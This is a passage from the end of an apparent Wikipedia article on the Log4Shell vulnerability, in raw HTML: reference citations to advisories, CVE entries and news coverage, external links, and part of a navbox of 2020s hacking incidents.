<li id="cite_note-33"><span class="mw-cite-backlink"><b><a href="#cite_ref-33">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://github.com/apache/logging-log4j2/pull/608">"Restrict LDAP access via JNDI by rgoers #608"</a>. <i>Log4j</i>. 5 December 2021<span class="reference-accessdate">. Retrieved <span class="nowrap">12 December</span> 2021</span> – via <a href="GitHub" title="GitHub">GitHub</a>.</cite></span>
</li>
<li id="cite_note-34"><span class="mw-cite-backlink"><b><a href="#cite_ref-34">^</a></b></span> <span class="reference-text"><cite id="CITEREFBerger2021" class="citation web cs1">Berger, Andreas (17 December 2021). <a rel="nofollow" class="external text" href="https://www.dynatrace.com/news/blog/what-is-log4shell/">"What is Log4Shell? The Log4j vulnerability explained (and what to do about it)"</a>. <i>Dynatrace news</i>. <q>Apache issued a patch for CVE-2021-44228, version 2.15, on December 6. However, this patch left part of the vulnerability unfixed, resulting in CVE-2021-45046 and a second patch, version 2.16, released on December 13. Apache released a third patch, version 2.17, on December 17 to fix another related vulnerability, CVE-2021-45105.</q></cite></span>
</li>
<li id="cite_note-35"><span class="mw-cite-backlink"><b><a href="#cite_ref-35">^</a></b></span> <span class="reference-text"><cite id="CITEREFRudis2021" class="citation web cs1">Rudis, boB (10 December 2021). <a rel="nofollow" class="external text" href="https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/">"Widespread Exploitation of Critical Remote Code Execution in Apache Log4j | Rapid7 Blog"</a>. <i>Rapid7</i>.</cite></span>
</li>
<li id="cite_note-cve-2021-45056-36"><span class="mw-cite-backlink">^ <a href="#cite_ref-cve-2021-45056_36-0"><sup><i><b>a</b></i></sup></a> <a href="#cite_ref-cve-2021-45056_36-1"><sup><i><b>b</b></i></sup></a> <a href="#cite_ref-cve-2021-45056_36-2"><sup><i><b>c</b></i></sup></a></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046">"CVE-2021-45046"</a>. <i>Common Vulnerabilities and Exposures</i>. 15 December 2021<span class="reference-accessdate">. Retrieved <span class="nowrap">15 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-37"><span class="mw-cite-backlink"><b><a href="#cite_ref-37">^</a></b></span> <span class="reference-text"><cite id="CITEREFGreig2021" class="citation web cs1">Greig, Jonathan (14 December 2021). <a rel="nofollow" class="external text" href="https://www.zdnet.com/article/second-log4j-vulnerability-found-apache-log4j-2-16-0-released/">"Second Log4j vulnerability discovered, patch already released"</a>. <i>ZDNet</i><span class="reference-accessdate">. Retrieved <span class="nowrap">17 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-38"><span class="mw-cite-backlink"><b><a href="#cite_ref-38">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://nvd.nist.gov/vuln/detail/CVE-2021-45105">"CVE-2021-45105"</a>. <i>National Vulnerability Database</i><span class="reference-accessdate">. Retrieved <span class="nowrap">4 January</span> 2022</span>.</cite></span>
</li>
<li id="cite_note-39"><span class="mw-cite-backlink"><b><a href="#cite_ref-39">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://nvd.nist.gov/vuln/detail/CVE-2021-44832">"CVE-2021-44832"</a>. <i>National Vulnerability Database</i><span class="reference-accessdate">. Retrieved <span class="nowrap">4 January</span> 2022</span>.</cite></span>
</li>
<li id="cite_note-40"><span class="mw-cite-backlink"><b><a href="#cite_ref-40">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://www.oracle.com/java/technologies/javase/8u121-relnotes.html">"Java(TM) SE Development Kit 8, Update 121 (JDK 8u121) Release Notes"</a>. Oracle. 17 January 2017<span class="reference-accessdate">. Retrieved <span class="nowrap">13 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-41"><span class="mw-cite-backlink"><b><a href="#cite_ref-41">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://www.veracode.com/blog/research/exploiting-jndi-injections-java">"Exploiting JNDI Injections in Java"</a>. <a href="Veracode" title="Veracode">Veracode</a>. 3 January 2019<span class="reference-accessdate">. Retrieved <span class="nowrap">15 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-lunasec-mitigation-guide-42"><span class="mw-cite-backlink"><b><a href="#cite_ref-lunasec-mitigation-guide_42-0">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/">"Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228)"</a>. <i>www.lunasec.io</i>. 13 December 2021<span class="reference-accessdate">. Retrieved <span class="nowrap">13 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-43"><span class="mw-cite-backlink"><b><a href="#cite_ref-43">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://www.cisa.gov/sites/default/files/publications/CSRB-Report-on-Log4-July-11-2022_508.pdf">"Review of the December 2021 Log4j Event"</a> <span class="cs1-format">(PDF)</span>. <a href="Cyber_Safety_Review_Board" title="Cyber Safety Review Board">Cyber Safety Review Board</a>. 11 July 2022<span class="reference-accessdate">. Retrieved <span class="nowrap">18 January</span> 2023</span>.</cite></span>
</li>
<li id="cite_note-44"><span class="mw-cite-backlink"><b><a href="#cite_ref-44">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://www.nccgroup.com/uk/apache-log4j-zero-day-recommendations-resources/">"Apache Log4j Zero Day Recommendations &amp; Resources"</a>. <a href="NCC_Group" title="NCC Group">NCC Group</a><span class="reference-accessdate">. Retrieved <span class="nowrap">18 January</span> 2023</span>.</cite></span>
</li>
<li id="cite_note-45"><span class="mw-cite-backlink"><b><a href="#cite_ref-45">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://www.ncsc.gov.uk/news/apache-log4j-vulnerability">"Alert: Apache Log4j vulnerabilities"</a>. <a href="National_Cyber_Security_Centre_(United_Kingdom)" title="National Cyber Security Centre (United Kingdom)">National Cyber Security Centre (United Kingdom)</a>. 10 December 2021<span class="reference-accessdate">. Retrieved <span class="nowrap">18 January</span> 2023</span>.</cite></span>
</li>
<li id="cite_note-46"><span class="mw-cite-backlink"><b><a href="#cite_ref-46">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://chasersystems.com/blog/log4shell-and-its-traces-in-a-network-egress-filter/">"Log4Shell and its traces in a network egress filter"</a>. Chaser Systems. 12 December 2021<span class="reference-accessdate">. Retrieved <span class="nowrap">18 January</span> 2023</span>.</cite></span>
</li>
<li id="cite_note-:2-47"><span class="mw-cite-backlink">^ <a href="#cite_ref-:2_47-0"><sup><i><b>a</b></i></sup></a> <a href="#cite_ref-:2_47-1"><sup><i><b>b</b></i></sup></a> <a href="#cite_ref-:2_47-2"><sup><i><b>c</b></i></sup></a></span> <span class="reference-text"><cite id="CITEREFWoodyard" class="citation web cs1">Woodyard, Chris. <a rel="nofollow" class="external text" href="https://www.usatoday.com/story/money/business/2021/12/16/log-4-j-vulnerability-small-business/8910567002/">"'Critical vulnerability': Smaller firms may find it harder to stop hackers from exploiting Log4j flaw"</a>. <i><a href="USA_Today" title="USA Today">USA Today</a></i><span class="reference-accessdate">. Retrieved <span class="nowrap">17 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-duckett2-48"><span class="mw-cite-backlink">^ <a href="#cite_ref-duckett2_48-0"><sup><i><b>a</b></i></sup></a> <a href="#cite_ref-duckett2_48-1"><sup><i><b>b</b></i></sup></a></span> <span class="reference-text"><cite id="CITEREFDuckett" class="citation web cs1">Duckett, Chris. <a rel="nofollow" class="external text" href="https://www.zdnet.com/article/log4j-rce-activity-began-on-december-1-as-botnets-start-using-vulnerability/">"Log4j RCE activity began on 1 December as botnets start using vulnerability"</a>. <i>ZDNet</i><span class="reference-accessdate">. Retrieved <span class="nowrap">13 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-49"><span class="mw-cite-backlink"><b><a href="#cite_ref-49">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://www.greynoise.io/blog/apache-log4j-vulnerability-CVE-2021-44228">"Exploit activity for Apache Log4j vulnerability - CVE-2021-44228"</a>. <i>Greynoise Research</i>. 10 December 2021<span class="reference-accessdate">. Retrieved <span class="nowrap">14 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-50"><span class="mw-cite-backlink"><b><a href="#cite_ref-50">^</a></b></span> <span class="reference-text"><cite id="CITEREFZugec2021" class="citation web cs1">Zugec, Martin (13 December 2021). <a rel="nofollow" class="external text" href="https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild">"Technical Advisory: Zero-day critical vulnerability in Log4j2 exploited in the wild"</a>. <i>Business Insights</i>. <a href="Bitdefender" title="Bitdefender">Bitdefender</a>.</cite></span>
</li>
<li id="cite_note-51"><span class="mw-cite-backlink"><b><a href="#cite_ref-51">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://www.cisa.gov/news/2021/12/11/statement-cisa-director-easterly-log4j-vulnerability">"Statement from CISA Director Easterly on "Log4j" Vulnerability"</a>. <i>CISA</i>. 11 December 2021.</cite></span>
</li>
<li id="cite_note-52"><span class="mw-cite-backlink"><b><a href="#cite_ref-52">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability">"FTC warns companies to remediate Log4j security vulnerability"</a>. Federal Trade Commission (FTC). 4 January 2022<span class="reference-accessdate">. Retrieved <span class="nowrap">6 January</span> 2022</span>.</cite></span>
</li>
<li id="cite_note-53"><span class="mw-cite-backlink"><b><a href="#cite_ref-53">^</a></b></span> <span class="reference-text"><cite class="citation news cs1"><a rel="nofollow" class="external text" href="https://gizmodo.com/after-log4j-open-source-software-is-now-a-national-sec-1848356403">"After Log4j, Open-Source Software Is Now a National Security Issue"</a>. <i>Gizmodo</i><span class="reference-accessdate">. Retrieved <span class="nowrap">16 January</span> 2022</span>.</cite></span>
</li>
<li id="cite_note-54"><span class="mw-cite-backlink"><b><a href="#cite_ref-54">^</a></b></span> <span class="reference-text"><cite id="CITEREFGreig" class="citation news cs1">Greig, Jonathan. <a rel="nofollow" class="external text" href="https://www.zdnet.com/article/after-log4j-white-house-worries-about-the-next-big-open-source-flaw/">"After Log4j, White House fears the next big open source vulnerability"</a>. <i>ZDNet</i><span class="reference-accessdate">. Retrieved <span class="nowrap">16 January</span> 2022</span>.</cite></span>
</li>
<li id="cite_note-55"><span class="mw-cite-backlink"><b><a href="#cite_ref-55">^</a></b></span> <span class="reference-text"><cite id="CITEREFSauerwein2021" class="citation web cs1 cs1-prop-foreign-lang-source">Sauerwein, Jörg (12 December 2021). <a rel="nofollow" class="external text" href="https://www.tagesschau.de/inland/bsi-schadsoftware-101.html">"BSI warnt vor Sicherheitslücke"</a>. <i><a href="Tagesschau_(German_TV_series)" class="mw-redirect" title="Tagesschau (German TV series)">Tagesschau</a></i> (in German).</cite></span>
</li>
<li id="cite_note-56"><span class="mw-cite-backlink"><b><a href="#cite_ref-56">^</a></b></span> <span class="reference-text"><cite class="citation pressrelease cs1 cs1-prop-foreign-lang-source"><a rel="nofollow" class="external text" href="https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2021/211211_log4Shell_WarnstufeRot.html">"Warnstufe Rot: Schwachstelle Log4Shell führt zu extrem kritischer Bedrohungslage"</a> [Red alarm: Log4Shell vulnerability causes extremely critical threat situation] (Press release) (in German). <a href="Federal_Office_for_Information_Security" title="Federal Office for Information Security">Federal Office for Information Security</a>. 11 December 2021.</cite></span>
</li>
<li id="cite_note-57"><span class="mw-cite-backlink"><b><a href="#cite_ref-57">^</a></b></span> <span class="reference-text"><cite id="CITEREFJ._Vaughan-Nichols2021" class="citation web cs1">J. Vaughan-Nichols, Steven (14 December 2021). <a rel="nofollow" class="external text" href="https://thenewstack.io/log4shell-we-are-in-so-much-trouble/">"Log4Shell: We Are in So Much Trouble"</a>. <i>The New Stack</i>.</cite></span>
</li>
<li id="cite_note-58"><span class="mw-cite-backlink"><b><a href="#cite_ref-58">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://github.com/NCSC-NL/log4shell">"NCSC-NL/log4shell"</a>. National Cyber Security Centre (Netherlands)<span class="reference-accessdate">. Retrieved <span class="nowrap">14 December</span> 2021</span> – via GitHub.</cite></span>
</li>
<li id="cite_note-59"><span class="mw-cite-backlink"><b><a href="#cite_ref-59">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://web.archive.org/web/20211220032436/https://www.cyber.gc.ca/en/news/statement-minister-national-defence-apache-vulnerability">"Statement from the Minister of National Defence on Apache Vulnerability and Call to Canadian Organizations to Take Urgent Action"</a>. <i>Government of Canada</i>. 12 December 2021. Archived from <a rel="nofollow" class="external text" href="https://cyber.gc.ca/en/news/statement-minister-national-defence-apache-vulnerability">the original</a> on 20 December 2021<span class="reference-accessdate">. Retrieved <span class="nowrap">12 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-60"><span class="mw-cite-backlink"><b><a href="#cite_ref-60">^</a></b></span> <span class="reference-text"><cite id="CITEREFCabrera2021" class="citation news cs1">Cabrera, Holly (12 December 2021). <a rel="nofollow" class="external text" href="https://www.cbc.ca/news/canada/montreal/quebec-cybersecurity-threat-government-website-1.6283133">"Facing cybersecurity threats, Quebec shuts down government websites for evaluation"</a>. <i><a href="CBC_News" title="CBC News">CBC News</a></i><span class="reference-accessdate">. Retrieved <span class="nowrap">12 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-61"><span class="mw-cite-backlink"><b><a href="#cite_ref-61">^</a></b></span> <span class="reference-text"><cite id="CITEREFStupp2021" class="citation web cs1">Stupp, Catherine (21 December 2021). <a rel="nofollow" class="external text" href="https://web.archive.org/web/20220207020204/https://www.wsj.com/articles/hackers-exploit-log4j-flaw-at-belgian-defense-ministry-11640020439">"Hackers Exploit Log4j Flaw at Belgian Defense Ministry"</a>. The Wall Street Journal. Archived from the original on 7 February 2022<span class="reference-accessdate">. Retrieved <span class="nowrap">14 February</span> 2022</span>.</cite><span class="cs1-maint citation-comment"><code class="cs1-code">{{cite web}}</code>: CS1 maint: bot: original URL status unknown (link)</span></span>
</li>
<li id="cite_note-62"><span class="mw-cite-backlink"><b><a href="#cite_ref-62">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://www.scmp.com/tech/big-tech/article/3160670/apache-log4j-bug-chinas-industry-ministry-pulls-support-alibaba-cloud">"Apache Log4j bug: China's industry ministry pulls support from Alibaba Cloud for not reporting flaw to government first"</a>. 22 December 2021.</cite></span>
</li>
<li id="cite_note-63"><span class="mw-cite-backlink"><b><a href="#cite_ref-63">^</a></b></span> <span class="reference-text"><cite id="CITEREFTung" class="citation web cs1">Tung, Liam. <a rel="nofollow" class="external text" href="https://www.zdnet.com/article/log4j-flaw-attacks-are-causing-lots-of-problems-microsoft-warns/">"Log4j flaw attack levels remain high, Microsoft warns"</a>. <i>ZDNet</i><span class="reference-accessdate">. Retrieved <span class="nowrap">5 January</span> 2022</span>.</cite></span>
</li>
<li id="cite_note-:3-64"><span class="mw-cite-backlink">^ <a href="#cite_ref-:3_64-0"><sup><i><b>a</b></i></sup></a> <a href="#cite_ref-:3_64-1"><sup><i><b>b</b></i></sup></a></span> <span class="reference-text"><cite id="CITEREFBray2021" class="citation web cs1">Bray, Hiawatha (15 December 2021). <a rel="nofollow" class="external text" href="https://www.bostonglobe.com/2021/12/15/business/emerging-log4j-software-bug-spawns-worldwide-worry-over-cyber-attacks/">"Emerging 'Log4j' software bug spawns worldwide worry over cyber attacks - The Boston Globe"</a>. <i><a href="The_Boston_Globe" title="The Boston Globe">The Boston Globe</a></i><span class="reference-accessdate">. Retrieved <span class="nowrap">17 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-65"><span class="mw-cite-backlink"><b><a href="#cite_ref-65">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://www.computerweekly.com/news/252510939/Almost-half-of-networks-probed-for-Log4Shell-weaknesses">"Almost half of networks probed for Log4Shell weaknesses"</a>. <i><a href="ComputerWeekly" class="mw-redirect" title="ComputerWeekly">ComputerWeekly</a></i>. 14 December 2021.</cite></span>
</li>
<li id="cite_note-66"><span class="mw-cite-backlink"><b><a href="#cite_ref-66">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-pandemic-detailed-dive/">"The numbers behind a cyber pandemic – detailed dive"</a>. <i><a href="Check_Point" title="Check Point">Check Point</a> Software</i>. 13 December 2021.</cite></span>
</li>
<li id="cite_note-67"><span class="mw-cite-backlink"><b><a href="#cite_ref-67">^</a></b></span> <span class="reference-text"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://issues.apache.org/jira/browse/LOG4J2-3201">"LOG4J2-3201: Limit the protocols JNDI can use and restrict LDAP"</a>. <i>Apache's JIRA issue tracker</i><span class="reference-accessdate">. Retrieved <span class="nowrap">14 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-68"><span class="mw-cite-backlink"><b><a href="#cite_ref-68">^</a></b></span> <span class="reference-text"><cite id="CITEREFMenashe2021" class="citation web cs1">Menashe, Shachar (13 December 2021). <a rel="nofollow" class="external text" href="https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/">"Log4Shell 0-Day Vulnerability: All You Need To Know"</a>. <i>JFrog Blog</i><span class="reference-accessdate">. Retrieved <span class="nowrap">13 December</span> 2021</span>.</cite></span>
</li>
<li id="cite_note-69"><span class="mw-cite-backlink"><b><a href="#cite_ref-69">^</a></b></span> <span class="reference-text"><cite class="citation news cs1"><a rel="nofollow" class="external text" href="https://www.bloomberg.com/news/articles/2021-12-13/how-apache-raced-to-fix-a-potentially-disastrous-software-flaw">"Inside the Race to Fix a Potentially Disastrous Software Flaw"</a>. <i>Bloomberg.com</i>. 13 December 2021.</cite></span>
</li>
</ol></div></div>
<div class="mw-heading mw-heading2"><h2 id="External_links">External links</h2></div>
<ul><li><a rel="nofollow" class="external text" href="https://logging.apache.org/log4j/2.x/">Log4j website</a></li>
<li><a rel="nofollow" class="external text" href="https://github.com/NCSC-NL/log4shell">NCSC overview of Log4Shell</a> on <a href="GitHub" title="GitHub">GitHub</a></li>
<li><a rel="nofollow" class="external text" href="https://cve.org/CVERecord?id=CVE-2021-44228">Common Vulnerabilities and Exposures page</a></li>
<li><a rel="nofollow" class="external text" href="https://nvd.nist.gov/vuln/detail/CVE-2021-44228">National Vulnerabilities Database page</a></li>
<li><a rel="nofollow" class="external text" href="https://blogs.apache.org/security/entry/cve-2021-44228">Projects affected by cve-2021-44228, by Apache Security Team</a></li></ul>
<div class="navbox-styles"><style data-mw-deduplicate="TemplateStyles:r1129693374">
/* start https://en.wikipedia.org/ */


.mw-parser-output .hlist dl,.mw-parser-output .hlist ol,.mw-parser-output .hlist ul{margin:0;padding:0}.mw-parser-output .hlist dd,.mw-parser-output .hlist dt,.mw-parser-output .hlist li{margin:0;display:inline}.mw-parser-output .hlist.inline,.mw-parser-output .hlist.inline dl,.mw-parser-output .hlist.inline ol,.mw-parser-output .hlist.inline ul,.mw-parser-output .hlist dl dl,.mw-parser-output .hlist dl ol,.mw-parser-output .hlist dl ul,.mw-parser-output .hlist ol dl,.mw-parser-output .hlist ol ol,.mw-parser-output .hlist ol ul,.mw-parser-output .hlist ul dl,.mw-parser-output .hlist ul ol,.mw-parser-output .hlist ul ul{display:inline}.mw-parser-output .hlist .mw-empty-li{display:none}.mw-parser-output .hlist dt::after{content:": "}.mw-parser-output .hlist dd::after,.mw-parser-output .hlist li::after{content:" · ";font-weight:bold}.mw-parser-output .hlist dd:last-child::after,.mw-parser-output .hlist dt:last-child::after,.mw-parser-output .hlist li:last-child::after{content:none}.mw-parser-output .hlist dd dd:first-child::before,.mw-parser-output .hlist dd dt:first-child::before,.mw-parser-output .hlist dd li:first-child::before,.mw-parser-output .hlist dt dd:first-child::before,.mw-parser-output .hlist dt dt:first-child::before,.mw-parser-output .hlist dt li:first-child::before,.mw-parser-output .hlist li dd:first-child::before,.mw-parser-output .hlist li dt:first-child::before,.mw-parser-output .hlist li li:first-child::before{content:" (";font-weight:normal}.mw-parser-output .hlist dd dd:last-child::after,.mw-parser-output .hlist dd dt:last-child::after,.mw-parser-output .hlist dd li:last-child::after,.mw-parser-output .hlist dt dd:last-child::after,.mw-parser-output .hlist dt dt:last-child::after,.mw-parser-output .hlist dt li:last-child::after,.mw-parser-output .hlist li dd:last-child::after,.mw-parser-output .hlist li dt:last-child::after,.mw-parser-output .hlist li li:last-child::after{content:")";font-weight:normal}.mw-parser-output .hlist ol{counter-reset:listitem}.mw-parser-output .hlist ol>li{counter-increment:listitem}.mw-parser-output .hlist ol>li::before{content:" "counter(listitem)"\a0 "}.mw-parser-output .hlist dd ol>li:first-child::before,.mw-parser-output .hlist dt ol>li:first-child::before,.mw-parser-output .hlist li ol>li:first-child::before{content:" ("counter(listitem)"\a0 "}


/* end https://en.wikipedia.org/ */
</style><style data-mw-deduplicate="TemplateStyles:r1236075235">
/* start https://en.wikipedia.org/ */


.mw-parser-output .navbox{box-sizing:border-box;border:1px solid #a2a9b1;width:100%;clear:both;font-size:88%;text-align:center;padding:1px;margin:1em auto 0}.mw-parser-output .navbox .navbox{margin-top:0}.mw-parser-output .navbox+.navbox,.mw-parser-output .navbox+.navbox-styles+.navbox{margin-top:-1px}.mw-parser-output .navbox-inner,.mw-parser-output .navbox-subgroup{width:100%}.mw-parser-output .navbox-group,.mw-parser-output .navbox-title,.mw-parser-output .navbox-abovebelow{padding:0.25em 1em;line-height:1.5em;text-align:center}.mw-parser-output .navbox-group{white-space:nowrap;text-align:right}.mw-parser-output .navbox,.mw-parser-output .navbox-subgroup{background-color:#fdfdfd}.mw-parser-output .navbox-list{line-height:1.5em;border-color:#fdfdfd}.mw-parser-output .navbox-list-with-group{text-align:left;border-left-width:2px;border-left-style:solid}.mw-parser-output tr+tr>.navbox-abovebelow,.mw-parser-output tr+tr>.navbox-group,.mw-parser-output tr+tr>.navbox-image,.mw-parser-output tr+tr>.navbox-list{border-top:2px solid #fdfdfd}.mw-parser-output .navbox-title{background-color:#ccf}.mw-parser-output .navbox-abovebelow,.mw-parser-output .navbox-group,.mw-parser-output .navbox-subgroup .navbox-title{background-color:#ddf}.mw-parser-output .navbox-subgroup .navbox-group,.mw-parser-output .navbox-subgroup .navbox-abovebelow{background-color:#e6e6ff}.mw-parser-output .navbox-even{background-color:#f7f7f7}.mw-parser-output .navbox-odd{background-color:transparent}.mw-parser-output .navbox .hlist td dl,.mw-parser-output .navbox .hlist td ol,.mw-parser-output .navbox .hlist td ul,.mw-parser-output .navbox td.hlist dl,.mw-parser-output .navbox td.hlist ol,.mw-parser-output .navbox td.hlist ul{padding:0.125em 0}.mw-parser-output .navbox .navbar{display:block;font-size:100%}.mw-parser-output .navbox-title .navbar{float:left;text-align:left;margin-right:0.5em}body.skin--responsive .mw-parser-output .navbox-image img{max-width:none!important}@media print{body.ns-0 .mw-parser-output .navbox{display:none!important}}


/* end https://en.wikipedia.org/ */
</style></div><div role="navigation" class="navbox" aria-labelledby="Hacking_in_the_2020s659" style="padding:3px"><table class="nowraplinks hlist mw-collapsible autocollapse navbox-inner" style="border-spacing:0;background:transparent;color:inherit"><tbody><tr><th scope="col" class="navbox-title" colspan="2"><style data-mw-deduplicate="TemplateStyles:r1239400231">
/* start https://en.wikipedia.org/ */


.mw-parser-output .navbar{display:inline;font-size:88%;font-weight:normal}.mw-parser-output .navbar-collapse{float:left;text-align:left}.mw-parser-output .navbar-boxtext{word-spacing:0}.mw-parser-output .navbar ul{display:inline-block;white-space:nowrap;line-height:inherit}.mw-parser-output .navbar-brackets::before{margin-right:-0.125em;content:"[ "}.mw-parser-output .navbar-brackets::after{margin-left:-0.125em;content:" ]"}.mw-parser-output .navbar li{word-spacing:-0.125em}.mw-parser-output .navbar a>span,.mw-parser-output .navbar a>abbr{text-decoration:inherit}.mw-parser-output .navbar-mini abbr{font-variant:small-caps;border-bottom:none;text-decoration:none;cursor:inherit}.mw-parser-output .navbar-ct-full{font-size:114%;margin:0 7em}.mw-parser-output .navbar-ct-mini{font-size:114%;margin:0 4em}html.skin-theme-clientpref-night .mw-parser-output .navbar li a abbr{color:var(--color-base)!important}@media(prefers-color-scheme:dark){html.skin-theme-clientpref-os .mw-parser-output .navbar li a abbr{color:var(--color-base)!important}}@media print{.mw-parser-output .navbar{display:none!important}}


/* end https://en.wikipedia.org/ */
</style><div id="Hacking_in_the_2020s659" style="font-size:114%;margin:0 4em">Hacking in the 2020s</div></th></tr><tr><td class="navbox-abovebelow" colspan="2"><div><table style="width:100%; margin:1px; display:inline-table;"><tbody><tr>

<td style="text-align:center; vertical-align:middle; padding:0 1px;" class=""><a href="List_of_security_hacking_incidents#2020s" title="List of security hacking incidents">Timeline</a></td>

</tr></tbody></table></div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">Major incidents</th><td class="navbox-list-with-group navbox-list navbox-odd" style="width:100%;padding:0"><div style="padding:0 0.25em"></div><table class="nowraplinks navbox-subgroup" style="border-spacing:0"><tbody><tr><th scope="row" class="navbox-group" style="width:1%">2020</th><td class="navbox-list-with-group navbox-list navbox-odd" style="width:100%;padding:0"><div style="padding:0 0.25em">
<ul><li><a href="BlueLeaks" title="BlueLeaks">BlueLeaks</a></li>
<li><a href="2020_Twitter_account_hijacking" title="2020 Twitter account hijacking">Twitter account hijacking</a></li>
<li><a href="European_Medicines_Agency_data_breach" title="European Medicines Agency data breach">European Medicines Agency data breach</a></li>
<li><a href="Nintendo_data_leak" title="Nintendo data leak">Nintendo data leak</a></li>
<li><a href="2020_United_States_federal_government_data_breach" title="2020 United States federal government data breach">United States federal government data breach</a></li>
<li><a href="EasyJet_data_breach" title="EasyJet data breach">EasyJet data breach</a></li>
<li><a href="Vastaamo_data_breach" title="Vastaamo data breach">Vastaamo data breach</a></li></ul>
</div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">2021</th><td class="navbox-list-with-group navbox-list navbox-even" style="width:100%;padding:0"><div style="padding:0 0.25em">
<ul><li><a href="2021_Microsoft_Exchange_Server_data_breach" title="2021 Microsoft Exchange Server data breach">Microsoft Exchange Server breach</a></li>
<li><a href="Ivanti_Pulse_Connect_Secure_data_breach" title="Ivanti Pulse Connect Secure data breach">Ivanti Pulse Connect Secure data breach</a></li>
<li><a href="Colonial_Pipeline_ransomware_attack" title="Colonial Pipeline ransomware attack">Colonial Pipeline ransomware attack</a></li>
<li><a href="Health_Service_Executive_ransomware_attack" title="Health Service Executive ransomware attack">Health Service Executive ransomware attack</a></li>
<li><a href="Waikato_District_Health_Board_ransomware_attack" title="Waikato District Health Board ransomware attack">Waikato District Health Board ransomware attack</a></li>
<li><a href="JBS_S.A._ransomware_attack" title="JBS S.A. ransomware attack">JBS S.A. ransomware attack</a></li>
<li><a href="Kaseya_VSA_ransomware_attack" title="Kaseya VSA ransomware attack">Kaseya VSA ransomware attack</a></li>
<li><a href="Transnet_ransomware_attack" title="Transnet ransomware attack">Transnet ransomware attack</a></li>
<li><a href="2021_Epik_data_breach" title="2021 Epik data breach">Epik data breach</a></li>
<li><a href="2021_FBI_email_hack" title="2021 FBI email hack">FBI email hack</a></li>
<li><a href="2021_National_Rifle_Association_ransomware_attack" title="2021 National Rifle Association ransomware attack">National Rifle Association ransomware attack</a></li>
<li><a href="2021_Banco_de_Oro_hack" title="2021 Banco de Oro hack">Banco de Oro hack</a></li></ul>
</div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">2022</th><td class="navbox-list-with-group navbox-list navbox-odd" style="width:100%;padding:0"><div style="padding:0 0.25em">
<ul><li><a href="2022_Ukraine_cyberattacks" title="2022 Ukraine cyberattacks">Ukraine cyberattacks</a></li>
<li><a href="Red_Cross_data_breach" title="Red Cross data breach">Red Cross data breach</a></li>
<li><a href="Anonymous_and_the_Russian_invasion_of_Ukraine" title="Anonymous and the Russian invasion of Ukraine">Anonymous and the Russian invasion of Ukraine</a></li>
<li><a href="Viasat_hack" title="Viasat hack">Viasat hack</a></li>
<li><a href="2022_DDoS_attacks_on_Romania" title="2022 DDoS attacks on Romania">DDoS attacks on Romania</a></li>
<li><a href="2022_Costa_Rican_ransomware_attack" title="2022 Costa Rican ransomware attack">Costa Rican ransomware attack</a></li>
<li><a href="LastPass#2022_customer_data_and_partially-encrypted_vault_theft" title="LastPass">LastPass vault theft</a></li>
<li><a href="Shanghai_police_database_leak" title="Shanghai police database leak">Shanghai police database leak</a></li>
<li><a href="Grand_Theft_Auto_VI#Leaks" title="Grand Theft Auto VI"><i>Grand Theft Auto VI</i> content leak</a></li></ul>
</div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">2023</th><td class="navbox-list-with-group navbox-list navbox-even" style="width:100%;padding:0"><div style="padding:0 0.25em">
<ul><li><a href="Munster_Technological_University_ransomware_attack" title="Munster Technological University ransomware attack">Munster Technological University ransomware attack</a></li>
